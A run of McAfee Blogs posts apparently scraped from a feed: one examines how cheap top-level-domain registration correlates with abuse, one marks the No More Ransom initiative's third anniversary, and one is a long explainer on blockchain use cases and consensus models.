For more insights and tips like these subscribe to this blog or check out the latest threats from our Threat Center.

[1] For a more complete list of these see: https://lolbas-project.github.io/

[2] Located within the Advanced Threat Protection module of ENS

The post What Is Mshta, How Can It Be Used and How to Protect Against It appeared first on McAfee Blogs.

Examining the Link Between TLD Prices and Abuse

Briefing

Over the years, McAfee researchers have observed that certain new top-level Domains (TLDs) are more likely to be abused by cyber criminals for malicious activities than others. Our investigations reveal a negative relationship between the likelihood for abuse and registration price of some TLDs, as reported by the McAfee URL and email intelligence team. This means that new TLDs are more likely to be picked up by cyber criminals if their registration prices are low.

What is a Top-level Domain?

According to Wikipedia, a top-level domain (TLD) is one of the domains at the highest level in the hierarchical Domain Name System of the Internet. It is the last part of the domain name, e.g. the TLD for www.google.com would be ‘com’.

There are two major types of TLD; country code TLD and generic TLD. The first type of TLD utilizes country codes directly, e.g. co.uk for the United Kingdom, and domains resolving to this type of TLD often have a strong tendency of serving those countries. Generic TLDs typically serve more general content and they form the basis of this study as they represent most of the domains we have observed recently.

TLD Registration Price

As noted by a previous article published by McAfee that bad hackers hack to make financial gains[1], there is no doubt that when cyber criminals plan to conduct malicious activities they will choose the method with the lowest cost to maximize their potential profits.

Below is a list of badly abused TLDs received from the McAfee URL and email intelligence team. Referencing domain.com, we found the one-year registration prices (domains created for malware attacks usually have a short lifespan as they are event-driven; normally they are taken off after the attack is stopped so they are registered for only one year, which is the minimal registration period required by many domain registration platforms, and that is why registration price is chosen for this study) for these abused TLDs are relatively low (under $20 for the first year) in comparison to other generic TLDs on the same list, which suggests that cost is a deciding factor.

To investigate that there is a possible relationship between TLD registration price and abuse rate, we investigated TLDs from different registration price ranges, from $1 to $270, and the results can be seen in the diagram below.   The ‘abuse rate’ mentioned in the diagram is the number of domains under a specific TLD that are marked as either Medium or High Risk by McAfee which are normally blocked at endpoints, divided by the total count of the domains under the same TLD logged in McAfee’s URL database.

We can see that, as TLD registration price goes down, especially when it dips below $20, the abuse rate soars up. This seems to suggest a correlation between price and abuse. Looking at the diagram, although the trend is clear, there are several anomalies. To the left of the diagram we have ‘.BEST’, while to the right we have ‘.HOST’, ‘.LINK’ and ‘.SALE’ for outliers.

A reason for ‘.BEST’ being an outlier could be because, firstly, we do not have many domains under this TLD, so it is possible that the result is skewed due to insufficient samples and, secondly, its lexical feature makes it a really good TLD for marketing domains, especially ones driven by spam activities, even though the registration price is on the higher side.   For the other outliers the reasoning is not so clear. It may be that their lexical features skew them closer to the legitimate side of things in comparison to the rest of the badly abused TLDs. Nonetheless, they still have abuse rates greater than 20%, so they are still badly abused if you compare them to the ones to the left of the diagram.

Side research

While conducting the above study we also considered the percentage of domains under these badly abused TLDs that are ranked among the highest trafficked websites, as reported by services such as Amazon Alexa. A study on the below six TLDs, which our email intelligence team report as being highly associated with spam activities, was carried out.

It can be seen from the chart above that for the domains under these six sample TLDs, the average percentage of Alexa top 1 million websites is below 1%, which reinforces the fact that these TLDs do not typically serve much legitimate content.  Organizations may want to evaluate these findings and based on their risk appetite undertake further scrutiny on the domain of inbound and outbound traffic.  The level of scrutiny undertaken on the originating source very rarely considers the price of registering a domain, and whilst such an approach may not be sufficient to warrant such analysis for many organizations, those with a low risk appetite may want to consider such action.

Advice to our customers

Different customers of McAfee’s have different security policies towards their endpoints which in turn supports their overall risk appeitite.. In regards to the graph depicted above different approaches might be taken on these TLDs that tend to be considered ‘too risky’. if enterprise customers would like to avail of this function, it can be easily achieved by adding a local rule in the McAfee Web Gateway Configuration Panel.

At the same time, for other organizations with a higher risk appetite, such aggressive approach might not be needed. Whatever the final action might be however, it is always good to review the security policies from time to time for your organization and consider what kind of policies would suit your business the best.

Meanwhile, to our Web Advisor customers, we would like to suggest that whenever you receive any URLs that resolve to the risky TLDs mentioned above, if it has a Unverified / Medium / High Risk reputation and/or it does not have any categories in McAfee’s database (which can be double checked at https://trustedsource.org), then please be wary of clicking on those URLs as they may pose a greater security risk to you.

Reference:

[1]. https://securingtomorrow.mcafee.com/consumer/identity-protection/are-all-hackers-bad/

The post Examining the Link Between TLD Prices and Abuse appeared first on McAfee Blogs.

No More Ransom Blows Out Three Birthday Candles Today

Collaborative Initiative Celebrates Helping More Than 200,000 Victims and Preventing More Than 100 million USD From Falling into Criminal Hands

Three years ago, on this exact day, the public and private sectors drew a line in the sand against ransomware. At that time, ransomware was becoming one of the most prevalent cyber threats globally. We were hearing stories of patients being turned away from hospitals and the urgent medical attention they needed because someone clicked on a link in an email! Since that time, every sector has had a litany of examples where companies targeted by ransomware attacks were faced with the digital equivalent of Sophie’s Choice: pay criminals or potentially lose your business.

Three years ago, to this very day, the No More Ransom initiative gave victims a third option: retrieve their files back for free. Of course, a silver bullet for all forms of ransomware does not exist but, as the free decryptor made available by the initiative for the GandCrab ransomware has shown, there is hope.

A Public Private Collaboration Where Success is Measured by Every Victim Saved

No More Ransom began because of an operational problem that could only be solved through collaboration. A Law Enforcement Agency had seized a server which contained private keys that could help decrypt thousands of victims of a particular ransomware family. This provided a great opportunity to help thousands of people—but there was a problem.

A Law Enforcement Agency is bound by a geographical jurisdiction; further, developing decryption software is not its core competency. Fortunately, both global reach and software development happened to be exactly what cybersecurity companies could bring to the table.

It is exciting to see how the initiative has expanded at an enormous rate. Back when we started, we would never have believed that in merely three years we would have helped over 200,000 victims and prevented more than 100 million US dollars from falling into criminal hands.

Even though cyber threats, including ransomware, are constantly evolving we remain confident that, together, we can continue to take a stand and disrupt this form of cybercrime. We are also delighted that so many public and private sector institutions have joined in this fight against the threat of ransomware. What began as a small group of individuals in a room in the Hague is now a global initiative, working together to fight back.

Remember #DontPay #NoMoreRansom

The post No More Ransom Blows Out Three Birthday Candles Today appeared first on McAfee Blogs.

Demystifying Blockchain: Sifting Through Benefits, Examples and Choices

You have likely heard that blockchain will disrupt everything from banking to retail to identity management and more. You may have seen commercials for IBM touting the supply chain tracking benefits of blockchain.[i]  It appears nearly every industry is investing in, adopting, or implementing blockchain. Someone has probably told you that blockchain can completely transform your business! Is this hype or could blockchain really have such a dramatic impact? In this analysis, we will explore both real-world and contrived examples for implementing this quickly developing technology. We will also explain the two key benefits blockchain provides, as well as when to look elsewhere for the appropriate solution. We will explain the primary distinguishing features of major blockchains to help you choose which, if any, is best for you.

Who Uses Blockchain?

Cryptocurrencies may be the best-known example of blockchain use, but they are not the only ones. American Express launched a blockchain linked to its membership rewards program in May 2018.[ii] This program has a lot of similarities to traditional currency exchanges and points reward systems. However, integrating the points rewards system into a blockchain can provide additional data beyond the transactions. American Express uses it to provide insight into partner offerings, while partners receive similar insight into customer behavior. The data associated with that transaction is valuable to both the rewards program owner and the partners that facilitate the rewards. Product manufacturers can use a blockchain system in this manner to accept rewards purchases through their own channels, while the program owner can get more visibility on stock keeping data. Data sharing to all parties can be simplified, enriching the entire ecosystem.[iii]

Not only financial institutions invest in blockchain. The energy sector is also developing plans. LO3 Energy is working on changing the way energy is distributed, particularly in local areas.[iv] Using this technology, they can facilitate energy trading between consumers, reducing inefficiencies and reliance on nonlocal sources. Siemens announced additional investment into LO3 Energy in December 2017. Together they will work to establish microgrid communities and local energy marketplaces.[v] Blockchain does not just store records of energy transactions; it can also facilitate and enforce business rules, creating automated execution of transactions between users.

Even your future commute may be positively impacted by blockchain technology. The auto industry is investing in blockchain in a big way. On May 2, 2018, the Mobile Open Blockchain Initiative announced a consortium of car manufacturing–related partners to standardize blockchain use in the industry.[vi] That announcement listed several upcoming projects:

  • Vehicle identity, history, and data tracking
  • Supply chain tracking, transparency, and efficiency
  • Autonomous machine and vehicle payments
  • Secure mobility ecosystem commerce
  • Data markets for autonomous and human driving
  • Car sharing and ride hailing
  • Usage-based mobility pricing and payments for vehicles, insurance, energy, congestion, pollution, and infrastructure

Many of these projects are related to data management. This is an obvious application because blockchain is a data-centric structure. Ford was recently awarded a patent related to the partnership.[vii] In the patent the company proposed a system for vehicle-to-vehicle cooperation to marshal traffic.

Figure 1: Image of traffic congestion from Ford’s patent application. Source: Ford Global Technologies.

To decrease congestion, each vehicle can communicate with each other to coordinate movement, improving traffic flow. The system also allows vehicles to collaborate based on priority. If the driver is in a hurry, then vehicles can coordinate traffic flow to the speed of that individual. One beneficial application could be for emergency responders.

Blockchain is still in its infancy but has already taken hold in certain industries. You do not need to be a programmer to understand its value. There are many use cases, some of which are not obvious until you understand exactly what blockchain is and which problems it solves. Applying blockchain to the right problem could have a significant impact on your success. Applying blockchain to the wrong problem may reduce your efficiency and waste time and resources.

What is Blockchain?

Rather than explain blockchain with technical jargon such as nonces, hash functions, merkle trees, and other complex concepts, let’s instead begin with a simple business analogy.

Four companies agree to a business opportunity to design, print, deliver, and sell 2020 New Year’s holiday cards. Each company is responsible for its own portion of the product. If the product is designed, printed, delivered, and sold by December 31, they stand to make a significant profit. However, if any one of the companies backs out or fails to deliver on its task, then the entire project fails—resulting in a significant loss.

Suppose, after agreeing to ship the cards, the delivery company receives a new, more lucrative offer. The profit from the opportunity offsets any loss from the holiday cards. Its priority changes accordingly. The three remaining companies now must deal with the consequences of one undependable member failing to fulfill its agreement. How can they come to an agreement when they depend on others yet cannot trust them to follow through?

This is the problem that blockchain solves. Rather than depending on a central authority such as a government for validation and enforcement, blockchain solves this problem in a decentralized way. It removes the need to trust the contributors or any authority. It is called a trustless network, meaning that no trust is needed because everything can be verified by any member. How does the concept of a trustless system work?

The agreement to contribute is called consensus. If even one member does not agree, whether for malicious purposes or through miscommunication, consensus is broken. It is the primary function of blockchain to guarantee consensus as well as immutability of the data. Consensus is gained through the consensus algorithm requiring a proof or voting threshold. We will discuss specific census algorithms and how they work later.

Blockchain can be thought of as a ledger of data, so ensuring the data cannot be tampered with (immutability) enables the verification of the ledger state. No one can go back and alter the books. Traditionally, the ledger is seen as a record of financial transactions. However, the concept applies to any type of data. One can just as easily store documents, images, log files, or other items in a blockchain. Even decentralized programs, also known as smart contracts, can be stored. Smart contracts enable the execution of code on the blockchain, but the code itself and its output are just a special type of data.

Figure 2: A simplified blockchain storing recipe instructions. The Previous Hash and Stuff fields generate the Hash field. This hash becomes part of the next record.

A blockchain has only two basic requirements:

  • A verifiable chain of blocks
  • A consensus model

Blocks simply store data. In our example, a block stores the agreements of the four companies. For cryptocurrencies this data is currency transactions. For a fresh-produce delivery company, the data might be sensor logs to verify proper handling and environmental controls. In certain unobvious implementations, even seemingly intangible objects such as the rules, assets, and user choices in a collectable card game can be stored as blocks.[viii]

Just because a block contains data does not make it trustworthy. Each block, more specifically its data, needs to be independently verified by all clients to ensure consensus. This concept requires data immutability. If a client cannot verify the block, then it must trust some authority, ultimately breaking the tenet of decentralization. Again, to avoid technical jargon, all we need to understand is that blocks can be uniquely identified by a hash. Think of a hash as a unique identification number that is not assigned, but rather calculated. Every client can calculate the same hash of the same block using the same algorithm. If any data changes, even a single character, the hash changes completely. By calculating and storing the hash, all parties can verify that the data has not changed. (In principle, there is a small chance, depending on the hashing function used, that more than one block could be identified with the same hash. However, the likelihood is so incredibly small that a brute-force attempt on current SHA-256 hashes would take longer than the age of the universe.)

We can verify an entire “chain” of blocks as well. Because the hash of any block is just data, it can be added to the data of the next block. By adding the hash of one block to the next, we can interlink the data of all blocks. The data of any block is dependent on all previous data in the chain. If anyone tampers with data in any previous block, the hash of that block changes as does its parent block’s hash, continuing all the way up the chain. Without needing to independently verify the data of every block, we can calculate each hash and verify the integrity of all data.

However, knowing the data has not changed is not enough to ensure the original data is still intact. For example, a disgruntled employee may wish to create their own blockchain and remove items from the record. In a centralized system, we could restrict write access to trusted parties, such as a database administrator. In a decentralized system, in which multiple companies or individuals are involved, limitations make that level of control impractical. There are a few ways to come to a consensus, but there are two primary categories for decentralized blockchains:

  • Nakamoto-style consensus (lottery)
  • Byzantine fault tolerance (voting)

The first category is Nakamoto-style consensus, named after the author of the first blockchain paper.[ix] This method is akin to using a lottery system with some verifiable “cost” associated. Because cryptocurrency is the most common implementation of blockchain, the cost is historically based on the processing power required to mine cryptocurrency, but it could also be storage space or time, among other resources.

The second method of consensus is Byzantine fault tolerance, a model based on current networking fault-tolerance research. As much as a lottery is analogous to the Nakamoto model, so is voting to the Byzantine fault-tolerance model. Each model has its pros and cons, which are important to understand when choosing a consensus model. We will describe major consensus implementations later in this analysis.

Both Nakamoto style and Byzantine fault tolerance consensuses have several implementations to choose from. Regardless of which implementation we choose, once a consensus is made these blocks can be chained together creating a single ledger of immutable data. Multiple chains may exist, but only one chain is agreed upon. Additional chains can be made by happenstance or by malicious actors, but only one chain will be considered correct by the network.

The following image shows a failed attack against a proof-of-work consensus model from a simulator. The green nodes all agree to use the longest chain, based on the consensus model. Bad actors, illustrated as red nodes, are unable to break the consensus of other members due to the high processing cost in the proof-of-work model. Notice the green, or “honest,” nodes all agree on the latest block simply by choosing the longest chain with the most work.

Figure 3: A proof-of-work simulation showing consensus despite malicious actors.

Comparing use Cases: the Good and the Bad

Data within blocks are similar to records in a database. Many scenarios can be accomplished by using traditional databases and in some cases are better suited to doing so. When is using a blockchain appropriate and when is it not? We can boil this question down to two principles:

  • Decentralization of owners
  • Lack of trust

Any system that requires centralization and tight control is not a good candidate for blockchain. In many cases we could make it work, but we would be better off looking elsewhere. A centralized system relies on some authority deciding what is valid. It can be streamlined to be incredibly efficient. By using a blockchain we must either give up that authority, losing efficiency, or maintain the authority, breaking key benefits of blockchain. There are also some gray areas where a balance must be met. Let’s take a look at good and bad use cases and compare them.

Decentralization: the good

Alice owns a hospital that serves thousands of patients a week. The medical staff need to have a clear picture of every patient’s medical history to make effective and safe decisions. When patients come in for the first time they are asked routine medical questions that are entered into their records. When the patients return, the records are retrieved and reviewed by the staff. However, patients sometimes have difficulty remembering key details or leave out important information. The hospital can request information from their previous providers. That may prove impractical in a time-sensitive scenario or when the patients are unable to assist. The patients might have one or more providers they have forgotten, leaving the staff ignorant of some medical history.

This is an example of the decentralization principle. Alice’s hospital has no control over any medical data not in its possession. That data is dependent on the accuracy of the patients and other medical practitioners. Alice also has no control over the other practitioners. She is dependent on their timely cooperation. Each entity needs to ensure the data is up to date and accurate while not being held accountable by the other. Who gets the final say on the entirety of the medical history? How does Alice know if she has it all? There are certainly centralized solutions to the problem, but the decentralized nature of the patients’ data flow lends itself well to a blockchain solution. Some solutions for this problem are already underway.[x]

Decentralization: the bad

Bob is the owner of a chain of restaurants in the Dallas area. To encourage customers to return, he has introduced a rewards system; customers can earn points by spending money at any of his restaurants. They can use the points to pay or reduce their next bill. As a bonus, he would like the points to be transferable to other patrons. Recognizing the similarities between his point system and cryptocurrencies, Bob implements a blockchain to track the distribution and transfer of the points. Members can join his blockchain network when they earn points. They can spend points by submitting the changes to the network. Bob does not even require names for the points. As long as the owners keep their account keys, they can freely transfer the points to anyone.

This scenario is deceptively similar to cryptocurrency implementations and the American Express rewards system. However, the similarities have confused Bob. His customers and individual restaurants are considered to be decentralized. However, Bob is the owner of all the restaurants and gets to make all business decisions for them. This is not a decentralization of owners but of management. In the American Express rewards program, each partner has its own agency. American Express does not control them or their actions. This is an example of a decentralization of owners. Furthermore, Bob’s customers are also not independent of Bob. If Bob decides to serve only pizza, then customers will have limits on what they can order. Bob is an authority in the entire system even if the pieces have varying degrees of autonomy. He can certainly allow managers to supply their own menu, but they are accountable to him. The system Bob envisions fails the decentralization principle.

Could Bob implement his point system anyways? Certainly. However, he fails to gain many of the advantages of using blockchain while losing the efficiency and agility of a traditional database implementation. Instead of blockchain, he could load points onto a rewards card that anyone could carry. The database can track the current balance of the card. Each restaurant can check the database before approving any purchases with points. This is a simple and effective system that has already been proven to be fairly robust. Bob’s case may not be a good candidate, but simple changes could change that. What if Bob did not own all the restaurants? What if the points could be used by partners such as hotel chains? These new features remove Bob as a central authority—making a much better case for a blockchain solution.

Trust: the good

Carol owns a grocery store and wants to buy only the freshest produce from her suppliers. However, sometimes she does not see the quality of the product until it is stocked, well after accepting delivery. Her suppliers maintain that the quality of the produce is good and any issues should have been raised at the time of delivery. They disagree who is at fault for the low-quality produce. It could be improper storage by the farmers, oversight of the goods by the shippers, or failure to check the goods by Carol’s grocery staff. To solve this issue, Carol and her suppliers created a blockchain network to track the handling of the produce. Storage sensors measure the moisture and heat of the storage unit as well as timestamps from the farm to final delivery. When the produce switches hands, a new record on the blockchain indicates the change and new storage sensor data collection begins.

Carol does not trust that produce is delivered in good condition. The suppliers do not trust that Carol stores the produce correctly. If each entity could validate proper storage, trust would not be required. Carol could decide, with limited inspections, whether to accept the produce based on its storage record. The farmers could prevent unreasonable returns based on faulty temperature control during shipping. This scenario fits the trust principle of among the participants. Additional measurements such as weight and images of the produce at various stages could also be added for further verification. If we suppose that the suppliers service many grocery stores and Carol buys from multiple suppliers, then we have an even stronger case for the decentralization principle as well.

Trust: the bad

Ted wants to create a sports card trading network. Users need to prove they legitimately own the cards. By registering the card in a blockchain, all users can track who owns which card and verify ownership if someone claims to own a rare or valuable card. Ted creates a blockchain to maintain the ownership data. When someone trades a card, the records are updated to reflect the change.

At first glance, this scenario is similar to Carol’s produce problem. A physical item must be delivered, and details are stored in the blockchain. However, Carol has the option to verify log data before she accepts the delivery. If there is a disagreement, the log data can justify who is at fault and they assume the cost. Ted, however, wants to track the physical object. Any disagreement will be about the delivery and location, not the quality of delivery and storage. If Ted delivers a card, the network trusts that he will update the records accordingly. If the network is updated, both the buyer and seller trust that the card was delivered. Data within this trading system cannot be independently verified. If there is a disagreement, there is no recourse within the network. The physical location of the card is important as well as the timing of both the physical and blockchain transactions. In Carol’s system, only the log data and the sum of the log data that needs to be verified are important. She answers the question, “Did you deliver the produce to spec?” Only then does a transaction happen. Carol’s recourse is not to accept the delivery. In Ted’s scenario, the card may be registered in the wrong hands—with no ability to correct the network.

Could a similar system work for Ted? Absolutely. One solution is to step into some gray area and add a little trust to the system. However, any required trust creates dependencies, so our goal is to reduce reliance on a trust model as much as possible. If Ted worked with digital trading cards instead of physical cards, he could reduce the trust factor to zero. The entire system could be contained in the network, eliminating any need for trust. If he must maintain physical cards, then he could learn from examples in the diamond industry. Beginning early in 2018, the diamond industry implemented blockchain to track 100 diamonds from mine to retail with a limited amount of trust .[xi] Each entity was required to upload data at each milestone, creating a method of verification. Trust in this case was reduced, but not eliminated, and allowed multiple stakeholders visibility into the diamonds in their possession. Ted could take a similar route to require a proof-of-delivery stage for a valid trade transaction. The harder the proof of delivery is to fake, the less trust the system needs. Any data coming from outside the network requires some form of trust. Ted can balance his needs for physical tracking against added trust in outside delivery verifications.

Holiday cards

How does the holiday card example fare with the decentralization and trust principles? It should be clear that the four companies have their own agency. They do not answer to the same management or boards of directors. The lack of centralization indicates blockchain could provide value that a traditional database could not. The trust principle is a bit more difficult to pin down, however. Certainly, they lack trust that each will do the job they were contracted to do. However, there are additional trust issues they may be concerned with. Can each party actually perform their obligations? Who is tracking the profits? If one party fails its part of the contract, how do the others recover? Each of these issues could be addressed using a blockchain implementation. To cover them all would be a massive undertaking, particularly in these early stages of the technology. Asset tracking could be resolved much like the diamond-tracking system we discussed. Financials could be tracked similarly to popular cryptocurrency implementations. Contract breach penalties could be built into the business logic using smart contracts—assuming the legal hurdles can be surmounted. What remains is the ability to gauge whether the obligations can be met in the first place. Each company could load relevant resources into a blockchain to be checked by another. This, unfortunately, requires a lot of trust that the data is entered correctly. Further work could be done to reduce this trust gap but those systems need to be designed and proven to be viable in major transactions.

Blockchain Options

You have determined you have a good case for blockchain. Now what? Do you build your own? Do you piggyback off current infrastructure such as Bitcoin scripts or Ethereum contracts? Create your own tokens? There are pros and cons to each. Fortunately, demand has created markets that can simplify your implementation. Which type of blockchain do you need?

Public, private, permissioned

There are three primary types of blockchain: public, private, and permissioned. A public blockchain is the best known. Bitcoin, Ethereum, and most other cryptocurrencies fall into this category. They are generally open to the public without restrictions. Private blockchains are not open to the public. The contributors to the network are well defined, with no outside entities allowed. Organizations may build a private blockchain in house or with a select group to solve a business need. Permissioned blockchains are provided to the public with a set of rules. Nodes are clearly identified, reducing anonymity. Access is provided only by invitation or request. Permissioned blockchains may have additional rules on the allowed behaviors of individuals or groups of nodes.

Public

Public blockchains are good for set-and-forget solutions, particularly if you are not much concerned with who participates in the network. You could build your own or quite easily fork a current blockchain. Technologies such as Ethereum smart contracts have a lot of support and even developing standards for enterprise-ready development. A major drawback to public blockchain is the lack of control of the network behavior and uploaded data. There are ways to partially resolve these concerns, but they can become complicated and limit the options of which technologies you can use. The most common public blockchain technologies are Bitcoin, with limited script support extension, and Ethereum, with more flexible smart contract support.

Pros

  • Improved security due to network participation, particularly on Nakamoto-style consensus models
  • The network is likely to remain active regardless of personal contribution
  • Lots of current implementations that can be used or learned from

Cons

  • The network is likely to remain active regardless of personal contribution
  • Lack of control over the network’s future
  • Internal behaviors and data are visible and difficult to hide

 Private

If you are developing a private blockchain, you may be better served using a database solution. Why? Private blockchains lose most of the security benefits of blockchain while assuming the complexities and speed reduction. They do gain more privacy with internal activity, but those benefits can also be gained in a permissioned blockchain and certainly with control of your own database. One notable exception to this advice is internal testing and prototyping. If you are prototyping, testing, experimenting, or otherwise learning about blockchain technologies, private blockchains can be your personal sandbox. For example, you could compile your own Ethereum network with a hardcoded difficulty rating to privately test new contracts you are developing. You may even wish to create a private blockchain for staging and plan to open it to others in the future. From this perspective, some may choose to accept a security reduction in the short term to ensure long-term reliability.

From a security perspective, it is false to assume that only trusted parties can contribute to a private blockchain. Through use of phishing, botnets, and cloud services, malicious attackers could gain entry to your private blockchain and perform attacks such as Sybil and 51% attacks.[xii] Due to the inherent lack of scale in private networks, these attacks may not only be possible, but also relatively cheap. This type of targeted attack on a private blockchain has not been publicly observed; however, similar attacks have been performed against smaller public blockchains.[xiii] If you choose the private blockchain route there are simple ways to achieve this without reinventing the wheel. One way is to clone any number of blockchain solutions such as Ethereum and configure the clients to connect to a custom network. You may wish to implement additional protection to authenticate valid users while relying on the readily available core technology.

Pros

  • Improved control over the network’s future
  • Internal activity and data can be designated to trusted participants
  • Required features can be tailored to business needs

Cons

  • Severely reduced security due to lack of adoption
  • Slower than any similar database solution
  • Code and network maintenance

Permissioned

Permissioned blockchains strike a balance between public and private blockchains. The best known permissioned blockchain is Hyperledger Fabric, a blockchain framework implementation.[xiv] Hyperledger Fabric enables organizations to maintain some control over their segment of the blockchain while gaining many benefits of broader adaptation. Each segment can control its own consensus model to govern their data, in this case through channels.[xv] This framework is seen as one of the most mature implementations of blockchain with enterprise-ready business solutions.[xvi] Other solutions include Hyperledger Sawtooth, Quorum, and Stellar, which are used by various companies.[xvii] [xviii] Forbes lists 50 top public companies investing in blockchain.[xix]

Pros

  • Improved control over the network’s future
  • Participants can be vetted based on the network’s needs
  • Provides most of the benefits of public blockchains with trade-offs in increased trust

Cons

  • Requires some trust in a central authority or consortium
  • Potentially reduced security based on adaptation
  • Requires commitment to keep your network segment active

Proof of work

Any agreement requires a consensus on the facts. Blockchain maintains what amounts to record entries that all participants agree on. The method on which participants agree to these records is called the consensus algorithm. Most consensus algorithms expend a finite resource to prove that work was required to write to the ledger. For every additional block in the blockchain, increasing resources are spent. This measurement is additive because each block must be computed separately. By knowing the difficulty of the work being done on each block, participants can calculate how much work was done on an entire chain. The longest chain is always considered the active chain. Thus, in a short time, participants will gain a consensus in which the records that make up the longest chain are agreed upon.

Proof-of-work is the most common consensus model. It was the first proof proposed in Satoshi Nakamoto’s paper “Bitcoin: A Peer-to-Peer Electronic Cash System.”[xx] The primary resource used in a proof-of-work algorithm is processing power, initially by the CPU. The most common implementation is based on the SHA-256 hashing algorithm. Each block is hashed using SHA-256, with the goal that the resulting hash is smaller than a target number. This number is chosen based on the speed with which the network mines blocks. If a block has a hash that is lower than or equal to the target number, then it is valid and can be appended to a chain. Lower targets create higher difficulty ratings on each block. These ratings are used to determine which chain used the most resources and is, therefore, the active one. In the following proof-of-work below, the difficulty rating represents a number preceded with five zeros. Any number with fewer than five zeros is bigger than the target and is invalid. The “header hash” of the block is used for this comparison. In lay terms, proof-of-work creates a mathematical problem and turns it into a lottery-like system. The winner is whoever solves the problem first. It offers the bonuses of controlling the speed of writing to the blockchain and enabling users to choose the same blockchain.

Figure 4: Hashing results from a proof-of-work simulator. A valid header hash starts with five zeros.

One of the primary criticisms of proof-of-work is its wasteful consumption of energy. Bitcoin’s implementation consumes enough energy to power 6.7 million households.[xxi] This consumption directly relates to cost when implementing your own blockchain solution. Researchers have sought alternatives to avoid excessive resource costs. This has led to several other consensus models.

Figure 5: Bitcoin power consumption compared to VISA transactions power consumption. Source: Digiconomist.

Proof of elapsed time (PoET)

Proof of elapsed time was first implemented in Hyperledger Sawtooth, originally developed by Intel. It is an example of a consensus model that does not require excess resource use or energy to form a consensus. Much like proof-of-work, it falls into the category of a Nakamoto consensus. The voting system is based on a random wait time; the node with the shortest wait time creates the next block of the chain.

In most cases it is impossible to guarantee a node has both chosen a random wait time and waited the indicated amount. However, using a trusted execution environment could resolve this issue. To properly implement a secure trusted environment, specialized hardware is required. Intel, using Software Guard Extensions (SGX), can execute machine instructions in a secure trusted environment called an enclave. The SGX instruction set in modern Intel processors enables trusted execution.[xxii] Key functionality such as the random number generator and wait time can be executed inside the secure enclave. They prevent attackers, even with local access, from altering the machine instructions, preserving the integrity of the results. By using certificates and signatures, others can further validate that the output did indeed run within the secure enclave.

The main benefit of using PoET instead of other Nakamoto consensus algorithms is that its resource use is low, reducing costs. By using a random wait time instead of processing cycles, the actual power consumption is minimized. However, this comes with two drawbacks:

  • Hardware requirements
  • Required third-party trust

Although the PoET documentation lists only SGX, other platforms exist, including AMD, ARM, and RISC-V.[xxiii] As of this writing, however, no major PoET implementation for these platforms is available, leaving SGX as the only current option. Due to this limitation, only modern Intel processors can participate in a PoET network. Mixed trusted execution environments are not guaranteed for the future. This is entirely dependent on whether a trust mechanism is ever developed between platforms.

PoET also requires third-party trust. In the case of SGX, nodes must trust Intel’s implementation of their secure trusted environment as well as Intel’s services. For code to be validated, the secure container must be confirmed as well. The process requires trust in the Intel Attestation Service (IAS). In the case of self-attestation, the IAS API must show the container has previously been enabled. If self-attestation was not previously enabled, then the API will be called to verify the retrieval of the attestation verification report. Both routes require a trusted response from IAS.

Figure 6: Remote attestation flow.[xxiv]

Practical Byzantine fault tolerance[xxv].

Practical Byzantine fault tolerance takes a different approach, with lessons learned from work in distributed systems. Byzantine fault tolerance was initially designed to measure the dependability of distributed systems. As we discussed earlier, it is more like a voting system than a lottery. Rather than every node spending a resource to prove work, consensus is gained by a leader choosing transaction orders. Validation peers then communicate to one another until there is a consensus on the chosen transactions. Leaders are chosen by validation peer votes, enabling any faulty or malicious leaders to be removed by the network. This model has a few benefits over a resource-based model such as proof-of-work. The primary benefit is the limitation of resource use, a major criticism of many other consensus models. However, this benefit comes at some cost:

  • Reduced resistance against attacks
  • Lack of anonymity
  • Increased traffic

A well-known attack against many blockchain implementations is the 51%, or majority, attack. By controlling more than 50% of the network, an attacker can change the historical records in the ledger as well as assert some control over new blocks being mined. Byzantine fault tolerance, by comparison, requires only one-third of the replication nodes to be compromised.[xxvi] Byzantine fault tolerance sacrifices some security for speed and efficiency, reducing the threshold an attacker needs to meet to compromise the network. Essentially, if an attacker can control one-third of the transaction replication, they can break the validity of the transactions or prevent a valid consensus altogether.

Figure 7: Practical Byzantine fault tolerance. Source: Altoros.

A second compromise with using Byzantine fault tolerance is anonymity. The nature of this model requires node identity to be known so leaders can be chosen and removed if necessary. This precludes public blockchain implementations and suggests permissioned blockchain is a better fit.

The replication nodes also generate extensive network traffic. When the leader decides on the valid transaction, each replication node waits on a designated number of consistent responses from other nodes. This creates a significant amount of network traffic that may be manageable only for small blockchain networks. The network requirements for large implementations become unmanageable in a Byzantine fault tolerance system. Each node must wait until two-thirds of the nodes agree, with every node broadcasting to each other. Permissioned blockchains reduce the communications to subsets of nodes, easing the network requirements to participate.

Proof of stake

Proof-of-Stake consensus takes a route similar to Byzantine fault tolerance’s and benefits from many of the latter’s properties. At its core, proof of stake is a voting system in which ownership of a token provides more weight to the block-creation mechanism. This algorithm claims significant advantages over proof-of-work including security, reduced risk of centralization, and energy efficiency.[xxvii] Proof of stake avoids wasting resources by limiting resource use such as processing power and offers the advantage of producing faster transactions than similar proof-of-work systems. Proof of stake’s integrity is based on the assumption that most users will behave honestly. This may not always be a valid assumption, as observed in a “P + epsilon attack,” in which a malicious user provides bonus rewards to buy votes. The attacker structures the reward so that it is always more profitable to vote with the attacker than otherwise.[xxviii] There have been some implementations and proposals to mitigate these types of attacks, such as the “slasher” method, which penalizes certain behaviors.[xxix] Major implementations of proof of stake include Peercoin and EOS, with future migration plans for Ethereum.[xxx]

Federated Byzantine agreement (Stellar consensus protocol)

When a node hears a statement a sufficient number of times, it assumes the statement is true and any contradiction comes from a faulty node. The agreeing nodes are called a quorum; a portion of the quorum is a quorum slice. In a traditional Byzantine fault tolerance algorithm such as practical Byzantine fault tolerance, the quorum and the quorum slice are interchangeable because the nodes that broadcast the original statements are predefined as leaders that participating nodes agree on. By allowing for the slice, individual nodes can come to an agreement about a particular statement without regard for the entire network. Each individual node can make its agreements based on arbitrary criteria if the statement comes from a sufficient number of other nodes. Agreements can be shared across nodes if there is a quorum intersection between the two nodes (an overlapping node between quorum slices). In other words, if my friend trusts you, then I’ll trust you too.

Figure 8: Chart of anonymity and trust between proof-of-work, proof-of-stake, and federated and non-federated Byzantine fault tolerance consensuses.[xxxi]

Conclusion

New technologies can be confusing, and the excitement can lead to many overexaggerated claims. Blockchain, though it holds a lot of promise, is not “one size fits all” for every problem. Many problems can be adequately solved at low cost using well-understood database implementations. The value of blockchain truly shines when the implementation space has two key elements:

  • Decentralization of owners
  • Lack of trust

